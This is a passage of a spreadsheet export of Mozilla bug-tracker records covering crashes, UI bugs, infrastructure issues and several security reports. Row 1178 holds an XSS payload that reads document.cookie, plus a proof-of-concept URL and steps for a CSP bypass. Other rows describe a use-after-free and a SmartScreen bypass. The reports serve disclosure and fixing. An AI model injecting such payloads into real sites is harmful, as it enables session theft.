      <c r="Q1178" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1178" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1178" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T1178" t="n">
        <v>1</v>
      </c>
      <c r="U1178" t="n">
        <v>0</v>
      </c>
      <c r="V1178" t="n">
        <v>62</v>
      </c>
      <c r="W1178" t="inlineStr">
        <is>
          <t>If an attacker injects a data-URI into a web application, the Content Security Policy of the linking site gets inherited. Example:
&lt;a href="data:text/html,&lt;script&gt;alert(document.cookie)&lt;/script&gt;"&gt;Click me&lt;/a&gt;
This attack would be mitigated with a reasonable CSP (or default-src 'none'), but the Browser will still visit the data-URI. If an attacker now manages to kill the Browser (due to bugs/exploits triggered by another tab or Addon installation or ...) Firefox will try to restore the browsing session when it is restarted. Now the data-URI will be opened in the context of the site protected with CSP but without enforcing a CSP.
Steps to reproduce:
1. XSS a site with CSP enabled:
http://poc.iceqll.eu/cspdata/?xss=&lt;a+href="data:text/html,&lt;script&gt;alert(document.cookie)&lt;/script&gt;"&gt;Click+me&lt;/a&gt;
2. Click the data-URI (or lure your victim into doing so).
3. Kill the Browser (after waiting a second):
killall -9 firefox-bin
4. Start the Browser again. Oops. CSP bypassed?
Not sure if this is really that much security critical because there are huge obstacles an attacker has to overcome (particularly killing the Browser).
Tested on Nightly build 26.0a1 (2013-08-31).</t>
        </is>
      </c>
      <c r="X1178" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" t="n">
        <v>865122</v>
      </c>
      <c r="B1179" t="inlineStr">
        <is>
          <t>2013-04-24 00:55:10 -0700</t>
        </is>
      </c>
      <c r="C1179" t="inlineStr">
        <is>
          <t>[A/V] is it possible to show buffering popup in the case of streaming?</t>
        </is>
      </c>
      <c r="D1179" t="inlineStr">
        <is>
          <t>2013-10-15 11:38:36 -0700</t>
        </is>
      </c>
      <c r="E1179" t="n">
        <v>1</v>
      </c>
      <c r="F1179" t="n">
        <v>1</v>
      </c>
      <c r="G1179" t="n">
        <v>6</v>
      </c>
      <c r="H1179" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1179" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1179" t="inlineStr">
        <is>
          <t>Gaia::Video</t>
        </is>
      </c>
      <c r="K1179" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1179" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1179" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1179" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1179" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1179" t="inlineStr">
        <is>
          <t>mentoredbug mentor=djf [TD-25210] c=video , MiniWW</t>
        </is>
      </c>
      <c r="Q1179" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1179" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1179" t="inlineStr">
        <is>
          <t>1.1 QE2 (6jun)</t>
        </is>
      </c>
      <c r="T1179" t="n">
        <v>1</v>
      </c>
      <c r="U1179" t="n">
        <v>0</v>
      </c>
      <c r="V1179" t="n">
        <v>43</v>
      </c>
      <c r="W1179" t="inlineStr">
        <is>
          <t>Contact: hjlee7111@gmail.com
Build ID : 20130419115238
When the device is connected by WIFI, I think there's no problem like this.
However, in 3G connection case, almost every streaming fills like freezing because app doesn't show any notification to user.
Application removes loading animation after it successfully load the video clip.
But then real buffering starts and user cannot figure out that streaming keeps going or it's stopped.
It fills like freezing...sometimes more than 20s.
(sometimes it's working...sometime it's stuck. I'm checking stuck case)
I think application should shows some information to user.</t>
        </is>
      </c>
      <c r="X1179" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" t="n">
        <v>865301</v>
      </c>
      <c r="B1180" t="inlineStr">
        <is>
          <t>2013-04-24 09:21:28 -0700</t>
        </is>
      </c>
      <c r="C1180" t="inlineStr">
        <is>
          <t>ES on jenkins is sick once again</t>
        </is>
      </c>
      <c r="D1180" t="inlineStr">
        <is>
          <t>2019-03-06 09:54:02 -0800</t>
        </is>
      </c>
      <c r="E1180" t="n">
        <v>1</v>
      </c>
      <c r="F1180" t="n">
        <v>1</v>
      </c>
      <c r="G1180" t="n">
        <v>6</v>
      </c>
      <c r="H1180" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1180" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J1180" t="inlineStr">
        <is>
          <t>WebOps: Other</t>
        </is>
      </c>
      <c r="K1180" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1180" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1180" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N1180" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1180" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1180" t="inlineStr"/>
      <c r="Q1180" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1180" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1180" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1180" t="n">
        <v>1</v>
      </c>
      <c r="U1180" t="n">
        <v>0</v>
      </c>
      <c r="V1180" t="n">
        <v>5</v>
      </c>
      <c r="W1180" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #859578 +++
For the past few days, all of our tests that depend on ES have been randomly failing and the problem seems to be getting worse.
Short term fix: restart ES please?
Thanks!</t>
        </is>
      </c>
      <c r="X1180" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" t="n">
        <v>21703</v>
      </c>
      <c r="B1181" t="inlineStr">
        <is>
          <t>1999-12-14 10:13:16 -0800</t>
        </is>
      </c>
      <c r="C1181" t="inlineStr">
        <is>
          <t>[dogfood]Folders autocollapse after expanding them</t>
        </is>
      </c>
      <c r="D1181" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E1181" t="n">
        <v>1</v>
      </c>
      <c r="F1181" t="n">
        <v>1</v>
      </c>
      <c r="G1181" t="n">
        <v>2</v>
      </c>
      <c r="H1181" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1181" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1181" t="inlineStr">
        <is>
          <t>MailNews: Message Display</t>
        </is>
      </c>
      <c r="K1181" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1181" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1181" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1181" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1181" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1181" t="inlineStr">
        <is>
          <t>[PDT+] Can't even begin to estimate.  Don't even understand the problem yet.</t>
        </is>
      </c>
      <c r="Q1181" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1181" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1181" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T1181" t="n">
        <v>1</v>
      </c>
      <c r="U1181" t="n">
        <v>0</v>
      </c>
      <c r="V1181" t="n">
        <v>23</v>
      </c>
      <c r="W1181" t="inlineStr">
        <is>
          <t>Open up mailnews.
Open the twisty on a server.  Select a folder.  The twisty will close itself.
If it doesn't happen by doing this, select a message.  This is usually enough to
make this happen.</t>
        </is>
      </c>
      <c r="X1181" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" t="n">
        <v>883778</v>
      </c>
      <c r="B1182" t="inlineStr">
        <is>
          <t>2013-06-17 02:53:55 -0700</t>
        </is>
      </c>
      <c r="C1182" t="inlineStr">
        <is>
          <t>It should be possible to disable jetpack tests via a manifest</t>
        </is>
      </c>
      <c r="D1182" t="inlineStr">
        <is>
          <t>2015-03-02 15:24:55 -0800</t>
        </is>
      </c>
      <c r="E1182" t="n">
        <v>1</v>
      </c>
      <c r="F1182" t="n">
        <v>1</v>
      </c>
      <c r="G1182" t="n">
        <v>6</v>
      </c>
      <c r="H1182" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1182" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J1182" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1182" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1182" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1182" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1182" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1182" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1182" t="inlineStr"/>
      <c r="Q1182" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1182" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1182" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1182" t="n">
        <v>1</v>
      </c>
      <c r="U1182" t="n">
        <v>0</v>
      </c>
      <c r="V1182" t="n">
        <v>11</v>
      </c>
      <c r="W1182" t="inlineStr">
        <is>
          <t>At the moment to disable a jetpack test (in the case of high intermittent failure rate), the disabling has to occur upstream and then another import of jetpack's repo performed.
We really need a disabled tests manifest in mozilla-central (outside of the imported source directory), so sheriffs can disable misbehaving tests (eg bug 882867) without having to resort to upstream changes (or making changes to mozilla-central that will just get overwritten on next import).
ie jetpack only partially adheres to:
https://wiki.mozilla.org/Sheriffing/Job_Visibility_Policy#9.29_Supports_the_disabling_of_individual_tests</t>
        </is>
      </c>
      <c r="X1182" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" t="n">
        <v>169790</v>
      </c>
      <c r="B1183" t="inlineStr">
        <is>
          <t>2002-09-19 16:34:27 -0700</t>
        </is>
      </c>
      <c r="C1183" t="inlineStr">
        <is>
          <t>CERT_DecodeDERCrlEx should be named CERT_DecodeDERCrlWithFlags</t>
        </is>
      </c>
      <c r="D1183" t="inlineStr">
        <is>
          <t>2002-09-23 14:46:31 -0700</t>
        </is>
      </c>
      <c r="E1183" t="n">
        <v>1</v>
      </c>
      <c r="F1183" t="n">
        <v>1</v>
      </c>
      <c r="G1183" t="n">
        <v>3</v>
      </c>
      <c r="H1183" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1183" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1183" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1183" t="inlineStr">
        <is>
          <t>3.6</t>
        </is>
      </c>
      <c r="L1183" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1183" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1183" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1183" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1183" t="inlineStr"/>
      <c r="Q1183" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1183" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1183" t="inlineStr">
        <is>
          <t>3.6</t>
        </is>
      </c>
      <c r="T1183" t="n">
        <v>1</v>
      </c>
      <c r="U1183" t="n">
        <v>0</v>
      </c>
      <c r="V1183" t="n">
        <v>4</v>
      </c>
      <c r="W1183" t="inlineStr">
        <is>
          <t>This bug is the result of a review of functions being newly exported in 
NSS 3.6 that Wan-Teh asked me to perform.
CERT_DecodeDERCrlEx is a new function being exported in NSS 3.6.  
I really dislike the Ex suffix.  It's a Microsoft-ism, IMO.  It tells the 
reader that we didn't think hard enough about the function in the first 
place and had to extend it, but it doesn't give any clue about what the 
extension is.  I don't think any other exported NSS functions end with Ex.  
I prefer something like "WithFlags", which explains what the addition to 
the API is.
We should fix this for NSS 3.6, or not at all.</t>
        </is>
      </c>
      <c r="X1183" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" t="n">
        <v>640339</v>
      </c>
      <c r="B1184" t="inlineStr">
        <is>
          <t>2011-03-09 14:28:42 -0800</t>
        </is>
      </c>
      <c r="C1184" t="inlineStr">
        <is>
          <t>generate-id() function leaks information about valid heap addresses</t>
        </is>
      </c>
      <c r="D1184" t="inlineStr">
        <is>
          <t>2023-01-16 11:48:17 -0800</t>
        </is>
      </c>
      <c r="E1184" t="n">
        <v>1</v>
      </c>
      <c r="F1184" t="n">
        <v>1</v>
      </c>
      <c r="G1184" t="n">
        <v>3</v>
      </c>
      <c r="H1184" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1184" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1184" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K1184" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1184" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1184" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1184" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1184" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1184" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q1184" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1184" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1184" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1184" t="n">
        <v>1</v>
      </c>
      <c r="U1184" t="n">
        <v>0</v>
      </c>
      <c r="V1184" t="n">
        <v>13</v>
      </c>
      <c r="W1184" t="inlineStr">
        <is>
          <t>As demonstrated at the test URL and announced on Chris Evans' blog the XPath generate-id() function returns a valid heap address which might provide a useful handle in other attacks. Appears to affect all browsers one way or another (Chrome was patched before announcing this).
http://scarybeastsecurity.blogspot.com/2011/03/multi-browser-heap-address-leak-in-xslt.html</t>
        </is>
      </c>
      <c r="X1184" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" t="n">
        <v>239722</v>
      </c>
      <c r="B1185" t="inlineStr">
        <is>
          <t>2004-04-05 11:56:20 -0700</t>
        </is>
      </c>
      <c r="C1185" t="inlineStr">
        <is>
          <t>Firefox install deletes windows system files</t>
        </is>
      </c>
      <c r="D1185" t="inlineStr">
        <is>
          <t>2006-06-26 07:29:20 -0700</t>
        </is>
      </c>
      <c r="E1185" t="n">
        <v>1</v>
      </c>
      <c r="F1185" t="n">
        <v>1</v>
      </c>
      <c r="G1185" t="n">
        <v>2</v>
      </c>
      <c r="H1185" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1185" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1185" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K1185" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1185" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1185" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1185" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1185" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1185" t="inlineStr">
        <is>
          <t>fixed0.9,fixed-aviary1.0</t>
        </is>
      </c>
      <c r="Q1185" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1185" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1185" t="inlineStr">
        <is>
          <t>Firefox0.9</t>
        </is>
      </c>
      <c r="T1185" t="n">
        <v>1</v>
      </c>
      <c r="U1185" t="n">
        <v>7</v>
      </c>
      <c r="V1185" t="n">
        <v>23</v>
      </c>
      <c r="W1185" t="inlineStr">
        <is>
          <t>toolkit has its own copy of the windows installer, needs its own fix for
potentially system-corrupting bug 236312.</t>
        </is>
      </c>
      <c r="X1185" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" t="n">
        <v>724284</v>
      </c>
      <c r="B1186" t="inlineStr">
        <is>
          <t>2012-02-04 10:24:11 -0800</t>
        </is>
      </c>
      <c r="C1186" t="inlineStr">
        <is>
          <t>use after free in nsXBLDocumentInfo::ReadPrototypeBindings</t>
        </is>
      </c>
      <c r="D1186" t="inlineStr">
        <is>
          <t>2012-04-20 12:23:45 -0700</t>
        </is>
      </c>
      <c r="E1186" t="n">
        <v>1</v>
      </c>
      <c r="F1186" t="n">
        <v>1</v>
      </c>
      <c r="G1186" t="n">
        <v>3</v>
      </c>
      <c r="H1186" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1186" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1186" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K1186" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1186" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1186" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1186" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q1186" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1186" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1186" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T1186" t="n">
        <v>1</v>
      </c>
      <c r="U1186" t="n">
        <v>0</v>
      </c>
      <c r="V1186" t="n">
        <v>43</v>
      </c>
      <c r="W1186" t="inlineStr">
        <is>
          <t>Olli found this.  Could be causing bug 724129.
nsXBLDocumentInfo::ReadPrototypeBindings:
653     nsXBLPrototypeBinding* binding = new nsXBLPrototypeBinding();
654     rv = binding-&gt;Read(stream, docInfo, doc, flags);
655     if (NS_FAILED(rv)) {
656       delete binding;
657       return rv;
658     }
nsXBLPrototypeBinding::Read:
1554   rv = aDocInfo-&gt;SetPrototypeBinding(id, this);
1555   NS_ENSURE_SUCCESS(rv, rv);
1556 
1557   nsCAutoString className;
1558   rv = aStream-&gt;ReadCString(className);
1559   NS_ENSURE_SUCCESS(rv, rv);
[... many other ways to fail without removing the binding ...]
ReadPrototypeBindings creates the binding, calls into Read, Read stores the binding in the hash table.  If the Read fails, then the binding is deleted.  But on any code path except one, the binding is kept in the table.
The cycle collector reads this table, grabs the bogus binding and attempts to do a virtual method call on it.  If bug 724129 is any indication, at least 90% of the time, this results in the browser attempting to execute at precisely the address 0x4246c83.  Maybe jemalloc ends up reusing the location for the binding immediately for something that points there.  That probably reduces how exploitable this is, but not all of these crashes look like that.
Read is only called in this one place.  I manually inspected the other calls to SetPrototypeBinding and they didn't seem to have this problem, but I'm not very familiar with this code.</t>
        </is>
      </c>
      <c r="X1186" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" t="n">
        <v>496605</v>
      </c>
      <c r="B1187" t="inlineStr">
        <is>
          <t>2009-06-05 11:04:40 -0700</t>
        </is>
      </c>
      <c r="C1187" t="inlineStr">
        <is>
          <t>Need to prevent optimized closure escape via foo.caller still</t>
        </is>
      </c>
      <c r="D1187" t="inlineStr">
        <is>
          <t>2009-09-27 23:37:55 -0700</t>
        </is>
      </c>
      <c r="E1187" t="n">
        <v>1</v>
      </c>
      <c r="F1187" t="n">
        <v>1</v>
      </c>
      <c r="G1187" t="n">
        <v>3</v>
      </c>
      <c r="H1187" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1187" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1187" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1187" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1187" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1187" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1187" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey [landed on 1.9.1]</t>
        </is>
      </c>
      <c r="Q1187" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1187" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1187" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T1187" t="n">
        <v>1</v>
      </c>
      <c r="U1187" t="n">
        <v>0</v>
      </c>
      <c r="V1187" t="n">
        <v>29</v>
      </c>
      <c r="W1187" t="inlineStr">
        <is>
          <t>Created attachment 381807
js shell testcase
See attached testcase. Easy fix, the assertion did its job.
/be</t>
        </is>
      </c>
      <c r="X1187" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" t="n">
        <v>1839703</v>
      </c>
      <c r="B1188" t="inlineStr">
        <is>
          <t>2023-06-21 10:52:52 -0700</t>
        </is>
      </c>
      <c r="C1188" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::ipc::DataPipeReceiver::AsyncWait::&lt;T&gt;::operator()]</t>
        </is>
      </c>
      <c r="D1188" t="inlineStr">
        <is>
          <t>2024-01-03 23:27:41 -0800</t>
        </is>
      </c>
      <c r="E1188" t="n">
        <v>1</v>
      </c>
      <c r="F1188" t="n">
        <v>1</v>
      </c>
      <c r="G1188" t="n">
        <v>3</v>
      </c>
      <c r="H1188" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1188" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1188" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K1188" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1188" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1188" t="inlineStr">
        <is>
          <t>Windows 11</t>
        </is>
      </c>
      <c r="N1188" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1188" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1188" t="inlineStr">
        <is>
          <t>[adv-main115.0.2+][adv-esr115.0.2+]</t>
        </is>
      </c>
      <c r="Q1188" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1188" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1188" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T1188" t="n">
        <v>1</v>
      </c>
      <c r="U1188" t="n">
        <v>0</v>
      </c>
      <c r="V1188" t="n">
        <v>48</v>
      </c>
      <c r="W1188" t="inlineStr">
        <is>
          <t>Crash report: https://crash-stats.mozilla.org/report/index/85986019-c55b-471d-a851-e951d0230621
Reason: ```EXCEPTION_ACCESS_VIOLATION_READ```
Top 10 frames of crashing thread:
```
0  xul.dll  mozilla::ipc::DataPipeReceiver::AsyncWait::&lt;lambda_8&gt;::operator const  ipc/glue/DataPipe.cpp:660
0  xul.dll  NS_NewCancelableRunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/ipc/glue/DataPipe.cpp:656:23'&gt;::FuncCancelableRunnable::Run  xpcom/threads/nsThreadUtils.h:667
1  xul.dll  mozilla::dom::  dom/workers/WorkerPrivate.cpp:202
2  xul.dll  mozilla::dom::WorkerRunnable::Run  dom/workers/WorkerRunnable.cpp:377
3  xul.dll  nsThread::ProcessNextEvent  xpcom/threads/nsThread.cpp:1234
3  xul.dll  NS_ProcessNextEvent  xpcom/threads/nsThreadUtils.cpp:479
4  xul.dll  mozilla::dom::WorkerPrivate::DoRunLoop  dom/workers/WorkerPrivate.cpp:3287
5  xul.dll  mozilla::dom::workerinternals::  dom/workers/RuntimeService.cpp:2149
6  xul.dll  nsThread::ProcessNextEvent  xpcom/threads/nsThread.cpp:1234
6  xul.dll  NS_ProcessNextEvent  xpcom/threads/nsThreadUtils.cpp:479
```
13 crashes on this signature, mostly on poison values. All of them are on workers.
The crash is on this line: `callback-&gt;OnInputStreamReady(self);`
Both `callback` and `self` are strong references held by the callback, so I'm not sure how we can have a UAF here.
Also odd is that this crash is only showing up on 115b7 and 115b8.</t>
        </is>
      </c>
      <c r="X1188" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" t="n">
        <v>598488</v>
      </c>
      <c r="B1189" t="inlineStr">
        <is>
          <t>2010-09-21 16:14:09 -0700</t>
        </is>
      </c>
      <c r="C1189" t="inlineStr">
        <is>
          <t>Update Firefox 4 Beta 7 features page</t>
        </is>
      </c>
      <c r="D1189" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E1189" t="n">
        <v>1</v>
      </c>
      <c r="F1189" t="n">
        <v>1</v>
      </c>
      <c r="G1189" t="n">
        <v>5</v>
      </c>
      <c r="H1189" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1189" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J1189" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1189" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1189" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1189" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1189" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1189" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1189" t="inlineStr"/>
      <c r="Q1189" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1189" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1189" t="inlineStr">
        <is>
          <t>4.0</t>
        </is>
      </c>
      <c r="T1189" t="n">
        <v>1</v>
      </c>
      <c r="U1189" t="n">
        <v>0</v>
      </c>
      <c r="V1189" t="n">
        <v>48</v>
      </c>
      <c r="W1189" t="inlineStr">
        <is>
          <t>Update this page with new copy (coming after code freeze). Will update the bug as soon as I have it.</t>
        </is>
      </c>
      <c r="X1189" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" t="n">
        <v>1447080</v>
      </c>
      <c r="B1190" t="inlineStr">
        <is>
          <t>2018-03-19 11:25:48 -0700</t>
        </is>
      </c>
      <c r="C1190" t="inlineStr">
        <is>
          <t>Security: SEE_MASK_FLAG_NO_UI behavior changes in Windows 10, allowing SmartScreen bypass</t>
        </is>
      </c>
      <c r="D1190" t="inlineStr">
        <is>
          <t>2019-01-15 02:00:38 -0800</t>
        </is>
      </c>
      <c r="E1190" t="n">
        <v>1</v>
      </c>
      <c r="F1190" t="n">
        <v>1</v>
      </c>
      <c r="G1190" t="n">
        <v>3</v>
      </c>
      <c r="H1190" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1190" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1190" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K1190" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L1190" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1190" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1190" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1190" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1190" t="inlineStr">
        <is>
          <t>[adv-main60+][adv-esr52.8+]</t>
        </is>
      </c>
      <c r="Q1190" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1190" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1190" t="inlineStr">
        <is>
          <t>mozilla61</t>
